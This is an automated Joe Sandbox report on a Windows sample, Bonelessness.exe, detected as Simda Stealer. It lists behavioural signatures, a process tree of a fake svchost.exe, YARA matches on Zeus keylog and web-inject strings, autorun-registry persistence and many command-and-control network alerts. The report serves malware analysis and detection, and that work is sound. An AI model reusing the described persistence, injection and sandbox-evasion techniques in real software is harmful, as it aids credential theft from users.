Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bonelessness.exe

Overview

General Information

Sample name:Bonelessness.exe
Analysis ID:1498165
MD5:475feaf47584ea0673437174181f5019
SHA1:be7f60898bf6e108aadc370b7ba9c3135bbfb4ee
SHA256:55bfe580ad47b8c5981ee39c1b267903ded5888ae93c474b19e31f18caa05e51
Tags:exeshiz
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (might use process or thread times for sandbox detection)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Too many similar processes found
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Bonelessness.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\Bonelessness.exe" MD5: 475FEAF47584EA0673437174181F5019)
    • svchost.exe (PID: 6720 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 579DA5BACB532A6B1670BE4418070F62)
      • JbrLYfXaOpqnSngA.exe (PID: 6260 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • JbrLYfXaOpqnSngA.exe (PID: 6216 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 8048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • JbrLYfXaOpqnSngA.exe (PID: 3496 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 8136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • JbrLYfXaOpqnSngA.exe (PID: 7140 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • JbrLYfXaOpqnSngA.exe (PID: 7124 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 7088 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 7064 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 7040 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 7024 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 7008 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 6988 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 6968 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 6944 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 6920 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 6896 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • JbrLYfXaOpqnSngA.exe (PID: 6876 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • svchost.exe (PID: 7908 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7976 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7984 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8100 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3468 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5600 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7684 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7672 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7772 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7780 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3912 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7576 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3808 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_SimdaStealerYara detected Simda StealerJoe Security
    00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x4ec70:$a1: name=%s&port=%u
    • 0x4e408:$a2: data_inject
    • 0x4e5f8:$a3: keylog.txt
    • 0x4e29d:$a4: User-agent: %s]]]
    • 0x4edc4:$a5: %s\%02d.bmp
    00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x48c10:$a1: name=%s&port=%u
    • 0x483a8:$a2: data_inject
    • 0x48598:$a3: keylog.txt
    • 0x4823d:$a4: User-agent: %s]]]
    • 0x48d64:$a5: %s\%02d.bmp
    00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_SimdaStealerYara detected Simda StealerJoe Security
      00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
      • 0x4e810:$a1: name=%s&port=%u
      • 0x4dfa8:$a2: data_inject
      • 0x4e198:$a3: keylog.txt
      • 0x4de3d:$a4: User-agent: %s]]]
      • 0x4e964:$a5: %s\%02d.bmp
      Click to see the 103 entries
      SourceRuleDescriptionAuthorStrings
      1.3.svchost.exe.39e0000.13.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
      • 0x47a10:$a1: name=%s&port=%u
      • 0x471a8:$a2: data_inject
      • 0x47398:$a3: keylog.txt
      • 0x4703d:$a4: User-agent: %s]]]
      • 0x47b64:$a5: %s\%02d.bmp
      8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
      • 0x48c10:$a1: name=%s&port=%u
      • 0x483a8:$a2: data_inject
      • 0x48598:$a3: keylog.txt
      • 0x4823d:$a4: User-agent: %s]]]
      • 0x48d64:$a5: %s\%02d.bmp
      0.2.Bonelessness.exe.406400.0.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
      • 0x48410:$a1: name=%s&port=%u
      • 0x47ba8:$a2: data_inject
      • 0x47d98:$a3: keylog.txt
      • 0x47a3d:$a4: User-agent: %s]]]
      • 0x48564:$a5: %s\%02d.bmp
      8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
      • 0x49e10:$a1: name=%s&port=%u
      • 0x495a8:$a2: data_inject
      • 0x49798:$a3: keylog.txt
      • 0x4943d:$a4: User-agent: %s]]]
      • 0x49f64:$a5: %s\%02d.bmp
      1.3.svchost.exe.39e0000.25.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
      • 0x47a10:$a1: name=%s&port=%u
      • 0x471a8:$a2: data_inject
      • 0x47398:$a3: keylog.txt
      • 0x4703d:$a4: User-agent: %s]]]
      • 0x47b64:$a5: %s\%02d.bmp
      Click to see the 183 entries

      System Summary

      barindex
      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Bonelessness.exe, ProcessId: 6696, TargetFilename: C:\Windows\apppatch\svchost.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bonelessness.exe", ParentImage: C:\Users\user\Desktop\Bonelessness.exe, ParentProcessId: 6696, ParentProcessName: Bonelessness.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 6720, ProcessName: svchost.exe
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\apppatch\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe, ProcessId: 6260, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\userinit
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 6720, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bonelessness.exe", ParentImage: C:\Users\user\Desktop\Bonelessness.exe, ParentProcessId: 6696, ParentProcessName: Bonelessness.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 6720, ProcessName: svchost.exe
      Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bonelessness.exe", ParentImage: C:\Users\user\Desktop\Bonelessness.exe, ParentProcessId: 6696, ParentProcessName: Bonelessness.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 6720, ProcessName: svchost.exe
      Timestamp:2024-08-23T18:47:41.392344+0200
      SID:2803437
      Severity:1
      Source Port:50749
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:41.392344+0200
      SID:2804852
      Severity:1
      Source Port:50749
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.589447+0200
      SID:2803437
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.589447+0200
      SID:2804852
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.518762+0200
      SID:2803437
      Severity:1
      Source Port:60209
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.518762+0200
      SID:2804852
      Severity:1
      Source Port:60209
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:41.908933+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:54206
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:52.906016+0200
      SID:2804852
      Severity:1
      Source Port:64285
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.720188+0200
      SID:2803437
      Severity:1
      Source Port:56393
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.720188+0200
      SID:2804852
      Severity:1
      Source Port:56393
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:00.817565+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:53971
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:52.139890+0200
      SID:2803437
      Severity:1
      Source Port:64276
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.139890+0200
      SID:2804852
      Severity:1
      Source Port:64276
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:00.092910+0200
      SID:2804852
      Severity:1
      Source Port:56396
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:39.077058+0200
      SID:2803437
      Severity:1
      Source Port:51130
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:39.077058+0200
      SID:2804852
      Severity:1
      Source Port:51130
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.071829+0200
      SID:2803437
      Severity:1
      Source Port:49736
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.071829+0200
      SID:2804852
      Severity:1
      Source Port:49736
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.728464+0200
      SID:2803437
      Severity:1
      Source Port:49651
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.728464+0200
      SID:2804852
      Severity:1
      Source Port:49651
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:37.314742+0200
      SID:2803437
      Severity:1
      Source Port:64303
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:37.314742+0200
      SID:2804852
      Severity:1
      Source Port:64303
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:16.686195+0200
      SID:2803437
      Severity:1
      Source Port:51111
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:16.686195+0200
      SID:2804852
      Severity:1
      Source Port:51111
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:41.773244+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:63402
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:42.016225+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:56536
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:48:55.045463+0200
      SID:2803437
      Severity:1
      Source Port:50027
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:55.045463+0200
      SID:2804852
      Severity:1
      Source Port:50027
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:17.325618+0200
      SID:2804852
      Severity:1
      Source Port:51114
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:54.006576+0200
      SID:2804852
      Severity:1
      Source Port:64286
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:56.952582+0200
      SID:2803437
      Severity:1
      Source Port:49517
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:56.952582+0200
      SID:2804852
      Severity:1
      Source Port:49517
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.434472+0200
      SID:2803437
      Severity:1
      Source Port:64290
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.434472+0200
      SID:2804852
      Severity:1
      Source Port:64290
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.643227+0200
      SID:2803437
      Severity:1
      Source Port:49736
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.643227+0200
      SID:2804852
      Severity:1
      Source Port:49736
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.147643+0200
      SID:2803437
      Severity:1
      Source Port:51125
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.147643+0200
      SID:2804852
      Severity:1
      Source Port:51125
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:52.579521+0200
      SID:2803437
      Severity:1
      Source Port:50118
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:52.579521+0200
      SID:2804852
      Severity:1
      Source Port:50118
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.493738+0200
      SID:2803437
      Severity:1
      Source Port:49657
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.493738+0200
      SID:2804852
      Severity:1
      Source Port:49657
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:44.031380+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:61998
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:47.309576+0200
      SID:2018141
      Severity:1
      Source Port:80
      Destination Port:63803
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:47.309576+0200
      SID:2037771
      Severity:1
      Source Port:80
      Destination Port:63803
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:01.618857+0200
      SID:2803437
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.618857+0200
      SID:2804852
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.282502+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:54974
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:49:00.831770+0200
      SID:2803437
      Severity:1
      Source Port:56389
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:00.831770+0200
      SID:2804852
      Severity:1
      Source Port:56389
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.473287+0200
      SID:2803437
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.473287+0200
      SID:2804852
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:29.319176+0200
      SID:2804852
      Severity:1
      Source Port:64296
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.186519+0200
      SID:2803437
      Severity:1
      Source Port:49655
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.186519+0200
      SID:2804852
      Severity:1
      Source Port:49655
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:51.934696+0200
      SID:2803437
      Severity:1
      Source Port:50117
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:51.934696+0200
      SID:2804852
      Severity:1
      Source Port:50117
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.438927+0200
      SID:2803437
      Severity:1
      Source Port:56392
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.438927+0200
      SID:2804852
      Severity:1
      Source Port:56392
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:58.452086+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:61952
      Protocol:UDP
      Classtype:A Network Trojan was detected
